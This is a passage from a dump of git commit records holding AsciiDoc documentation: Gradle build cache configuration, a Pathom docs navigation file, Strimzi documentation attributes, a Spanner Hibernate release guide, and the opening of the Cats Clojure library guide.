link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCache.html#isPush--[BuildCache.isPush()] set to `true`.\n\nBy default, the local build cache has push enabled, and the remote build cache has push disabled.\n\nThe local build cache is pre-configured to be a link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache] and enabled by default.\nThe remote build cache can be configured by specifying the type of build cache to connect to (link:{groovyDslPath}\/org.gradle.caching.configuration.BuildCacheConfiguration.html#org.gradle.caching.configuration.BuildCacheConfiguration:remote(java.lang.Class)[BuildCacheConfiguration.remote(java.lang.Class)]).\n\n[[sec:build_cache_configure_local]]\n=== Built-in local build cache\n\nThe built-in local build cache, link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache], uses a directory to store build cache artifacts.\nBy default, this directory resides in the Gradle user home directory, but its location is configurable.\n\nGradle will periodically clean-up the local cache directory by removing entries that have not been used recently to conserve disk space.\nHow often Gradle will perform this clean-up is configurable as shown in the example below.\nNote that cache entries are cleaned-up regardless of the project they were produced by.\nTherefore it is recommended to configure this setting globally in the <<init_scripts.adoc#sec:using_an_init_script,init script>>.\nThe <<sec:build_cache_configure_use_cases, Configuration use-cases>> section has an example of putting cache configuration in the init script.\n\nFor more details on the configuration options refer to the DSL documentation of link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache].\nHere is an example of the configuration.\n\n.Configure the local cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-directory-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-directory-build-cache]\"]\n====\n\n[[sec:build_cache_configure_remote]]\n=== Remote HTTP build cache\n\nlink:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html[HttpBuildCache] provides the ability read to and write from a remote cache via HTTP.\n\nWith the following configuration, the local build cache will be used for storing build outputs while the local and the remote build cache will be used for retrieving build outputs.\n\n.Load from HttpBuildCache\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=http-build-cache]\"]\n====\n\nWhen attempting to load an entry, a `GET` request is made to `\\https:\/\/example.com:8123\/cache\/\u00abcache-key\u00bb`.\nThe response must have a `2xx` status and the cache entry as the body, or a `404 Not Found` status if the entry does not exist.\n\nWhen attempting to store an entry, a `PUT` request is made to `\\https:\/\/example.com:8123\/cache\/\u00abcache-key\u00bb`.\nAny `2xx` response status is interpreted as success.\nA `413 Payload Too Large` response may be returned to indicate that the payload is larger than the server will accept, which will not be treated as an error.\n\n==== Specifying access credentials\n\nhttps:\/\/en.wikipedia.org\/wiki\/Basic_access_authentication[HTTP Basic Authentication] is supported, with credentials being sent preemptively.\n\n.Specifying access credentials\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-http-build-cache]\"]\n====\n\n[[sec:build_cache_redirects]]\n==== Redirects\n\n`3xx` redirecting responses will be followed automatically.\n\nServers must take care when redirecting `PUT` requests as only `307` and `308` redirect responses will be followed with a `PUT` request.\nAll other redirect responses will be followed with a `GET` request, as per https:\/\/datatracker.ietf.org\/doc\/html\/rfc7231#page-54[RFC 7231],\nwithout the entry payload as the body.\n\n[[sec:build_cache_error_handling]]\n==== Network error handling\n\nRequests that fail during request transmission, after having established a TCP connection, will be retried automatically.\n\nThis prevents temporary problems, such as connection drops, read or write timeouts, and low level network failures such as a connection resets, causing cache operations to fail and disabling the remote cache for the remainder of the build.\n\nRequests will be retried up to 3 times.\nIf the problem persists, the cache operation will fail and the remote cache will be disabled for the remainder of the build.\n\n==== Using SSL\n\nBy default, use of HTTPS requires the server to present a certificate that is trusted by the build's Java runtime.\nIf your server's certificate is not trusted, you can:\n\n1. Update the trust store of your Java runtime to allow it to be trusted\n2. Change the <<build_environment.adoc#build_environment,build environment>> to use an alternative trust store for the build runtime\n3. Disable the requirement for a trusted certificate\n\nThe trust requirement can be disabled by setting link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:allowUntrustedServer[HttpBuildCache.isAllowUntrustedServer()] to `true`.\nEnabling this option is a security risk, as it allows any cache server to impersonate the intended server.\nIt should only be used as a temporary measure or in very tightly controlled network environments.\n\n.Allow untrusted cache server\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=allow-untrusted-server]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=allow-untrusted-server]\"]\n====\n\n[[sec:build_cache_expect_continue]]\n==== HTTP expect-continue\n\nUse of https:\/\/www.w3.org\/Protocols\/rfc2616\/rfc2616-sec8.html#sec8.2.3[HTTP Expect-Continue] can be enabled.\nThis causes upload requests to happen in two parts: first a check whether a body would be accepted, then transmission of the body if the server indicates it will accept it.\n\nThis is useful when uploading to cache servers that routinely redirect or reject upload requests,\nas it avoids uploading the cache entry just to have it rejected (e.g. the cache entry is larger than the cache will allow) or redirected.\nThis additional check incurs extra latency when the server accepts the request, but reduces latency when the request is rejected or redirected.\n\nNot all HTTP servers and proxies reliably implement Expect-Continue.\nBe sure to check that your cache server does support it before enabling.\n\nTo enable, set link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:useExpectContinue[HttpBuildCache.isUseExpectContinue()] to `true`.\n\n.Use Expect-Continue\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=use-expect-continue]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=use-expect-continue]\"]\n====\n\n[[sec:build_cache_configure_use_cases]]\n=== Configuration use cases\n\nThe recommended use case for the remote build cache is that your continuous integration server populates it from clean builds while developers only load from it.\nThe configuration would then look as follows.\n\n.Recommended setup for CI push use case\n====\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/groovy\",files=\"settings.gradle[tags=developer-ci-setup]\"]\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/kotlin\",files=\"settings.gradle.kts[tags=developer-ci-setup]\"]\n====\n\nIt is also possible to configure the build cache from an <<init_scripts.adoc#sec:using_an_init_script,init script>>, which can be used from the command line, added to your Gradle user home or be a part of your custom Gradle distribution.\n\n.Init script to configure the build cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/groovy\",files=\"init.gradle[]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/kotlin\",files=\"init.gradle.kts[]\"]\n====\n\n[[sec:build_cache_composite]]\n=== Build cache, composite builds and `buildSrc`\n\nGradle's <<composite_builds.adoc#composite_builds,composite build feature>> allows including other complete Gradle builds into another.\nSuch included builds will inherit the build cache configuration from the top level build, regardless of whether the included builds define build cache configuration themselves or not.\n\nThe build cache configuration present for any included build is effectively ignored, in favour of the top level build's configuration.\nThis also applies to any `buildSrc` projects of any included builds.\n\nThe <<organizing_gradle_projects.adoc#sec:build_sources,`buildSrc` directory>> is treated as an <<composite_builds.adoc#composite_build_intro,included build>>, and as such it inherits the build cache configuration from the top-level build.\n\n[NOTE]\n====\nThis configuration precedence does not apply to <<composite_builds.adoc#included_plugin_builds,plugin builds>> included through `pluginManagement` as these are loaded _before_ the cache configuration itself.\n====\n\n[[sec:build_cache_setup_http_backend]]\n== How to set up an HTTP build cache backend\n\nGradle provides a Docker image for a link:https:\/\/hub.docker.com\/r\/gradle\/build-cache-node\/[build cache node], which can connect with Gradle Enterprise for centralized management.\nThe cache node can also be used without a Gradle Enterprise installation with restricted functionality.\n\n[[sec:build_cache_implement]]\n== Implement your own Build Cache\n\nUsing a different build cache backend to store build outputs (which is not covered by the built-in support for connecting to an HTTP backend) requires implementing\nyour own logic for connecting to your custom build cache backend.\nTo this end, custom build cache types can be registered via link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCacheConfiguration.html#registerBuildCacheService-java.lang.Class-java.lang.Class-[BuildCacheConfiguration.registerBuildCacheService(java.lang.Class, java.lang.Class)].\n\nlink:https:\/\/gradle.com\/build-cache[Gradle Enterprise] includes a high-performance, easy to install and operate, shared build cache backend.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aed2893d12e4f347d02fd794638bcadabfc42767","subject":"No Pathom titles","message":"No Pathom titles\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/nav.adoc","new_file":"docs-src\/modules\/ROOT\/nav.adoc","new_contents":"* xref:introduction.adoc[Introduction]\n* xref:upgrade-guide.adoc[Upgrade Guide]\n* xref:connect.adoc[Connect]\n** xref:connect\/basics.adoc[The Basics]\n** xref:connect\/resolvers.adoc[Resolvers]\n** xref:connect\/connect-mutations.adoc[Connect Mutations]\n** xref:connect\/shared-resolvers.adoc[Shared Resolvers]\n** xref:connect\/thread-pool.adoc[Using Thread Pool]\n** xref:connect\/readers.adoc[Connect Readers]\n** xref:connect\/indexes.adoc[Understanding the Indexes]\n** xref:connect\/exploration.adoc[Exploration with Pathom Viz]\n* xref:plugins.adoc[Plugins]\n* xref:core.adoc[Core Engine]\n** xref:core\/getting-started.adoc[Getting Started]\n** xref:core\/parsers.adoc[Parsers]\n** xref:core\/readers.adoc[Readers]\n** xref:core\/entities.adoc[Entity]\n** xref:core\/error-handling.adoc[Error handling]\n** xref:core\/dispatch-helpers.adoc[Dispatch helpers]\n** xref:core\/mutations.adoc[Mutations]\n** xref:core\/request-cache.adoc[Request Caching]\n** xref:core\/placeholders.adoc[Placeholders]\n** xref:core\/trace.adoc[Tracing]\n** xref:core\/path-track.adoc[Path tracking]\n** xref:core\/async.adoc[Async parser]\n* xref:cljs-specs.adoc[Remove specs on Clojurescript]\n* xref:other-helpers.adoc[Other helpers]\n* xref:graphql.adoc[GraphQL Integration]\n","old_contents":"* xref:introduction.adoc[Introduction]\n* xref:upgrade-guide.adoc[Upgrade Guide]\n* xref:connect.adoc[Pathom Connect]\n** xref:connect\/basics.adoc[The Basics]\n** xref:connect\/resolvers.adoc[Resolvers]\n** xref:connect\/connect-mutations.adoc[Connect Mutations]\n** xref:connect\/shared-resolvers.adoc[Shared Resolvers]\n** xref:connect\/thread-pool.adoc[Using Thread Pool]\n** xref:connect\/readers.adoc[Connect Readers]\n** xref:connect\/indexes.adoc[Understanding the Indexes]\n** xref:connect\/exploration.adoc[Exploration with Pathom Viz]\n* xref:plugins.adoc[Pathom Plugins]\n* xref:core.adoc[Pathom Core Engine]\n** xref:core\/getting-started.adoc[Getting Started]\n** xref:core\/parsers.adoc[Parsers]\n** xref:core\/readers.adoc[Readers]\n** xref:core\/entities.adoc[Entity]\n** xref:core\/error-handling.adoc[Error handling]\n** xref:core\/dispatch-helpers.adoc[Dispatch helpers]\n** xref:core\/mutations.adoc[Mutations]\n** xref:core\/request-cache.adoc[Request Caching]\n** xref:core\/placeholders.adoc[Placeholders]\n** xref:core\/trace.adoc[Tracing]\n** xref:core\/path-track.adoc[Path tracking]\n** xref:core\/async.adoc[Async parser]\n* xref:cljs-specs.adoc[Remove specs on Clojurescript]\n* xref:other-helpers.adoc[Other helpers]\n* xref:graphql.adoc[GraphQL Integration]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aea2834c10ea31dcc96428e0d10c52042326f868","subject":"Enable link even on section headings which are not in the TOC (#1045)","message":"Enable link even on section headings which are not in the TOC (#1045)\n\n","repos":"ppatierno\/kaas,scholzj\/barnabas,ppatierno\/kaas,scholzj\/barnabas","old_file":"documentation\/common\/attributes.adoc","new_file":"documentation\/common\/attributes.adoc","new_contents":"\/\/ AsciiDoc settings\n:data-uri!:\n:doctype: book\n:experimental:\n:idprefix:\n:imagesdir: images\n:numbered:\n:sectanchors!:\n:sectnums:\n:sectlinks:\n:source-highlighter: highlightjs\n:toc: left\n:linkattrs:\n:toclevels: 3\n\n\/\/ Name placeholders\n:ProductLongName: Strimzi\n:ProductName: Strimzi\n:ContextProduct: strimzi\n:ProductVersion: master\n:OpenShiftName: OpenShift\n:OpenShiftLongName: OpenShift Origin\n:OpenShiftVersion: 3.9 and later\n:KubernetesName: Kubernetes\n:KubernetesLongName: Kubernetes\n:KubernetesVersion: 1.9 and later\n:ProductPlatformName: {OpenShiftName} or {KubernetesName}\n:ProductPlatformLongName: {OpenShiftLongName} or {KubernetesLongName}\n:Namespace: {OpenShiftName} project or {KubernetesName} namespace\n:Namespaces: {OpenShiftName} projects or {KubernetesName} namespaces\n\n\/\/ Source and download links\n:ReleaseDownload: https:\/\/github.com\/strimzi\/strimzi-kafka-operator\/releases[GitHub^]\n\n\/\/ Helm Chart\n:ChartName: strimzi-kafka-operator\n:ChartReleaseCoordinate: strimzi\/strimzi-kafka-operator\n:ChartRepositoryUrl: http:\/\/strimzi.io\/charts\/\n\n\/\/ External links\n:KafkaRacks: link:https:\/\/kafka.apache.org\/documentation\/#basic_ops_racks[Kafka racks documentation^]\n:K8sAffinity: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/assign-pod-node\/[Kubernetes node and pod affinity documentation^]\n:K8sTolerations: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/taint-and-toleration\/[Kubernetes taints and tolerations^]\n:K8sEmptyDir: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#emptydir[`emptyDir` volumes^]\n:K8sPersistentVolumeClaims: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/dynamic-provisioning\/[Persistent Volume Claims^]\n:K8sLocalPersistentVolumes: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#local[Local persistent volumes^]\n:K8SStorageClass: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/storage-classes\/[Storage Class^]\n:K8sMeaningOfCpu: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-cpu[Meaning of CPU^]\n:K8sMeaningOfMemory: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-memory[Meaning of memory^]\n:K8sManagingComputingResources: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/[Managing Compute Resources for Containers^]\n:K8sLivenessReadinessProbes: link:https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[Configure Liveness and Readiness Probes^]\n\n\n:ApacheKafkaBrokerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#brokerconfigs[Apache Kafka documentation^]\n:ApacheKafkaConnectConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#connectconfigs[Apache Kafka documentation^]\n:ApacheZookeeperConfig: link:http:\/\/zookeeper.apache.org\/doc\/r3.4.13\/zookeeperAdmin.html[Zookeeper documentation^]\n:ApacheKafkaConsumerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#newconsumerconfigs[Apache Kafka documentation^]\n:ApacheKafkaProducerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#producerconfigs[Apache Kafka documentation^]\n\n:JMXExporter: link:https:\/\/github.com\/prometheus\/jmx_exporter[JMX Exporter documentation^]\n\n\/\/ Docker image names\n:DockerTag: {ProductVersion}\n:DockerRepository: https:\/\/hub.docker.com\/u\/strimzi[Docker Hub^]\n:DockerZookeeper: strimzi\/zookeeper:{DockerTag}\n:DockerKafka: strimzi\/kafka:{DockerTag}\n:DockerKafkaConnect: strimzi\/kafka-connect:{DockerTag}\n:DockerKafkaConnectS2I: strimzi\/kafka-connect-s2i:{DockerTag}\n:DockerTopicController: strimzi\/topic-controller:{DockerTag}\n:DockerImageUser: kafka:kafka\n\n\/\/ API Versions\n:KafkaApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectS2IApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaTopicApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaUserApiVersion: kafka.strimzi.io\/v1alpha1\n\n\/\/ Section enablers\n:Kubernetes:\n:Helm:\n:InstallationAppendix:\n:MetricsAppendix:\n:Downloading:\n:SecurityImg:\n","old_contents":"\/\/ AsciiDoc settings\n:data-uri!:\n:doctype: book\n:experimental:\n:idprefix:\n:imagesdir: images\n:numbered:\n:sectanchors!:\n:sectnums:\n:source-highlighter: highlightjs\n:toc: left\n:linkattrs:\n:toclevels: 3\n\n\/\/ Name placeholders\n:ProductLongName: Strimzi\n:ProductName: Strimzi\n:ContextProduct: strimzi\n:ProductVersion: master\n:OpenShiftName: OpenShift\n:OpenShiftLongName: OpenShift Origin\n:OpenShiftVersion: 3.9 and later\n:KubernetesName: Kubernetes\n:KubernetesLongName: Kubernetes\n:KubernetesVersion: 1.9 and later\n:ProductPlatformName: {OpenShiftName} or {KubernetesName}\n:ProductPlatformLongName: {OpenShiftLongName} or {KubernetesLongName}\n:Namespace: {OpenShiftName} project or {KubernetesName} namespace\n:Namespaces: {OpenShiftName} projects or {KubernetesName} namespaces\n\n\/\/ Source and download links\n:ReleaseDownload: https:\/\/github.com\/strimzi\/strimzi-kafka-operator\/releases[GitHub^]\n\n\/\/ Helm Chart\n:ChartName: strimzi-kafka-operator\n:ChartReleaseCoordinate: strimzi\/strimzi-kafka-operator\n:ChartRepositoryUrl: http:\/\/strimzi.io\/charts\/\n\n\/\/ External links\n:KafkaRacks: link:https:\/\/kafka.apache.org\/documentation\/#basic_ops_racks[Kafka racks documentation^]\n:K8sAffinity: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/assign-pod-node\/[Kubernetes node and pod affinity documentation^]\n:K8sTolerations: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/taint-and-toleration\/[Kubernetes taints and tolerations^]\n:K8sEmptyDir: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#emptydir[`emptyDir` volumes^]\n:K8sPersistentVolumeClaims: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/dynamic-provisioning\/[Persistent Volume Claims^]\n:K8sLocalPersistentVolumes: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#local[Local persistent volumes^]\n:K8SStorageClass: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/storage-classes\/[Storage Class^]\n:K8sMeaningOfCpu: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-cpu[Meaning of CPU^]\n:K8sMeaningOfMemory: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-memory[Meaning of memory^]\n:K8sManagingComputingResources: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/[Managing Compute Resources for Containers^]\n:K8sLivenessReadinessProbes: link:https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[Configure Liveness and Readiness Probes^]\n\n\n:ApacheKafkaBrokerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#brokerconfigs[Apache Kafka documentation^]\n:ApacheKafkaConnectConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#connectconfigs[Apache Kafka documentation^]\n:ApacheZookeeperConfig: link:http:\/\/zookeeper.apache.org\/doc\/r3.4.13\/zookeeperAdmin.html[Zookeeper documentation^]\n:ApacheKafkaConsumerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#newconsumerconfigs[Apache Kafka documentation^]\n:ApacheKafkaProducerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#producerconfigs[Apache Kafka documentation^]\n\n:JMXExporter: link:https:\/\/github.com\/prometheus\/jmx_exporter[JMX Exporter documentation^]\n\n\/\/ Docker image names\n:DockerTag: {ProductVersion}\n:DockerRepository: https:\/\/hub.docker.com\/u\/strimzi[Docker Hub^]\n:DockerZookeeper: strimzi\/zookeeper:{DockerTag}\n:DockerKafka: strimzi\/kafka:{DockerTag}\n:DockerKafkaConnect: strimzi\/kafka-connect:{DockerTag}\n:DockerKafkaConnectS2I: strimzi\/kafka-connect-s2i:{DockerTag}\n:DockerTopicController: strimzi\/topic-controller:{DockerTag}\n:DockerImageUser: kafka:kafka\n\n\/\/ API Versions\n:KafkaApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectS2IApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaTopicApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaUserApiVersion: kafka.strimzi.io\/v1alpha1\n\n\/\/ Section enablers\n:Kubernetes:\n:Helm:\n:InstallationAppendix:\n:MetricsAppendix:\n:Downloading:\n:SecurityImg:\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac4a20eb9282d1662ec66fb052ff1e46292dd821","subject":"Update RELEASING.adoc (#162)","message":"Update RELEASING.adoc (#162)\n\n","repos":"GoogleCloudPlatform\/google-cloud-spanner-hibernate,GoogleCloudPlatform\/google-cloud-spanner-hibernate,GoogleCloudPlatform\/google-cloud-spanner-hibernate","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"# How to Release to Maven Central\n\n## Snapshots\n\nA commit to the `master` branch will automatically trigger the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/continuous` job that will publish snapshots to Sonatype Snapshots repository. The scripts can be found in the `.kokoro` directory.\n\n## Releases\n\n. Run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/stage` Kokoro job.\n\n. In the build logs, find the name of the ID of the staging repository. You should see a log line that looks something like this:\n```\n[INFO] * Created staging repository with ID \"comgooglecloud-1345\".\n```\nThe ID in this case is `comgooglecloud-1345`.\n\n. Verify staged artifacts at http:\/\/oss.sonatype.org.\n(If you don't have access to `com.google.cloud`, please make a request similar to https:\/\/issues.sonatype.org\/browse\/OSSRH-52371[this one] and ask for support from someone who already has access to this group ID.)\n\n. If you want to drop the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/drop` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. If you want to release the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/promote` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. Verify that the new version has been published to Maven Central by checking https:\/\/repo.maven.apache.org\/maven2\/com\/google\/cloud\/google-cloud-spanner-hibernate-dialect\/[here]. This might take a while.\n\n. Open a PR to update the release version in the https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/blob\/master\/spanner\/hibernate\/pom.xml[sample app]. Here's a https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/pull\/1617[sample PR].\n\n. Update the version in the https:\/\/codelabs.developers.google.com\/codelabs\/cloud-spanner-hibernate\/[codelab].\n\n. https:\/\/github.com\/GoogleCloudPlatform\/google-cloud-spanner-hibernate\/releases[Create] a new release on GitHub.\n\n. Increment the project base version. For example, from `0.1.0.BUILD-SNAPSHOT` to `0.2.0.BUILD-SNAPSHOT`.\n","old_contents":"# How to Release to Maven Central\n\n## Snapshots\n\nA commit to the `master` branch will automatically trigger the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/continuous` job that will publish snapshots to Sonatype Snapshots repository. The scripts can be found in the `.kokoro` directory.\n\n## Releases\n\n. Run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/stage` Kokoro job.\n\n. In the build logs, find the name of the ID of the staging repository. You should see a log line that looks something like this:\n```\n[INFO] * Created staging repository with ID \"comgooglecloud-1345\".\n```\nThe ID in this case is `comgooglecloud-1345`.\n\n. Verify staged artifacts at http:\/\/oss.sonatype.org.\n(If you don't have access to `com.google.cloud`, please make a request similar to https:\/\/issues.sonatype.org\/browse\/OSSRH-52371[this one] and ask for support from someone who already has access to this group ID.)\n\n. If you want to drop the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/drop` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. If you want to release the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/promote` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. Verify that the new version has been published to Maven Central by checking https:\/\/repo.maven.apache.org\/maven2\/com\/google\/cloud\/google-cloud-spanner-hibernate-dialect\/[here].\n\n. Open a PR to update the release version in the https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/blob\/master\/spanner\/hibernate\/pom.xml[sample app]. Here's a https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/pull\/1617[sample PR].\n\n. https:\/\/github.com\/GoogleCloudPlatform\/google-cloud-spanner-hibernate\/releases[Create] a new release on GitHub.\n\n. Increment the project base version. For example, from `0.1.0.BUILD-SNAPSHOT` to `0.2.0.BUILD-SNAPSHOT`.\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"505985b21971aa59faada78d6d0ce3e536698852","subject":"Rename Clojure with clojure in asciidoctor codeblock attribute.","message":"Rename Clojure with clojure in asciidoctor codeblock attribute.\n","repos":"mccraigmccraig\/cats,alesguzik\/cats,tcsavage\/cats,yurrriq\/cats,funcool\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"= Cats Documentation\nAndrey Antukh & Alejandro G\u00f3mez\n0.4.0-SNAPSHOT\n:toc: left\n:numbered:\n:source-highlighter: pygments\n:pygments-style: friendly\n\nimage:logo.png[cats logo]\n\n== Introduction\n\nCategory Theory abstractions for Clojure.\n\n=== Why another library?\n\nBecause the cats library:\n\n- targets both of the most-used Clojure implementations: *Clojure (jvm)* and *ClojureScript(js)*\n- aims to have the simplest implementation of the supported abstractions.\n- aims to have more abstractions that are simple monads.\n- has documentation as first class citizen.\n- licensed under a permissive license (compared to other libraries): BSD (2-Clause)\n\n\n== Project Maturity\n\nSince _cats_ is a young project, there can be some link:api\/index.html#id[API] breakage.\n\n\n== Install\n\nThis section covers installing _cats_.\n\n\n=== Leiningen\n\nThe simplest way to use _cats_ in a Clojure project is by including\nit as a dependency in your *_project.clj_*:\n\n[source,clojure]\n----\n[cats \"0.4.0-SNAPSHOT\"]\n----\n\n\n=== Maven\n\nAlso, you can use it with Maven. First, add the Clojars repository:\n\n[source,xml]\n----\n<repository>\n <id>clojars.org<\/id>\n <url>http:\/\/clojars.org\/repo<\/url>\n<\/repository>\n----\n\nThen for cats:\n\n[source,xml]\n----\n<dependency>\n <groupId>cats<\/groupId>\n <artifactId>cats<\/artifactId>\n <version>0.4.0-SNAPSHOT<\/version>\n<\/dependency>\n----\n\n\n=== Get the Code\n\n_cats_ is open source and can be found on link:https:\/\/github.com\/funcool\/cats[github].\n\nYou can clone the public repository with this command:\n\n[source,text]\n----\ngit clone https:\/\/github.com\/funcool\/cats\n----\n\n\n== User Guide\n\nThis section introduces almost all the category theory abstractions that the _cats_ library\nsupports.\n\nWe will use the _Maybe_ for the example snippets, because it has support for all\nthe abstractions and it is very easy to understand. You can read more about it in the next\nsection of the documentation.\n\n\n=== Functor\n\nLet's start with the functor. The Functor represents some sort of \"computational context\", and the\nabstraction consists of one unique function: *fmap*.\n\n.Signature of *fmap* function\n[source, clojure]\n----\n(fmap [f fv])\n----\n\nThe higher-order function *fmap* takes a plain function as the first parameter and\nvalue wrapped in a functor context as the second parameter. It extracts the inner value\napplies the function to it, and returns the result wrapped in same type as the second\nparameter.\n\nBut, what is the *functor context*? It sounds more complex than it is. A Functor\nwrapper is any type that acts as \"Box\" and implements the `Context` and `Functor` protocols.\n\n.One good example of a functor is the *Maybe* type:\n[source, clojure]\n----\n(require '[cats.monad.maybe :as maybe])\n\n;; `just` function is one of two constructors of Maybe\n\n(maybe\/just 2)\n;; => #<Just [2]>\n----\n\nLet's see one example using *fmap* over *just* instance:\n\n.Example using fmap over *just* instance.\n[source, clojure]\n----\n(require '[cats.core :as m]\n '[cats.monad.maybe :refer [just]])\n\n(m\/fmap inc (just 1))\n;; => #<Just [2]>\n----\n\nWe mentioned above that *fmap* extracts the value from the functor context. You will also want to\nextract values wrapped by *just* and you can do that with *from-maybe*.\n\n.Example using *from-maybe* to extract values wrapped by *just*.\n[source, clojure]\n----\n(require '[cats.monad.maybe :refer [just from-maybe]])\n\n(from-maybe (just 1))\n;; => 1\n(from-maybe (nothing))\n;; => nil\n(from-maybe (nothing) 42)\n;; => 42\n----\n\nThe *Maybe* type also has another constructor: `nothing`. It represents the absence of a value.\nIt is a safe substitute for `nil` and may represent failure.\n\nLet's see what happens if we perform the same operation as the previous example over a *nothing*\ninstance:\n\n.Example using fmap over *nothing*.\n[source, clojure]\n----\n(fmap inc (nothing))\n;; => #<Nothing >\n----\n\nOh, awesome, instead of raising a `NullPointerException`, it just returns *nothing*. Another\nadvantage of using the functor abstraction, is that it always returns a result\nof the same type as its second argument.\n\nLet's see an example of applying fmap over a Clojure vector:\n\n.Example using fmav over *vector*.\n[source, clojure]\n----\n(fmap inc [1 2 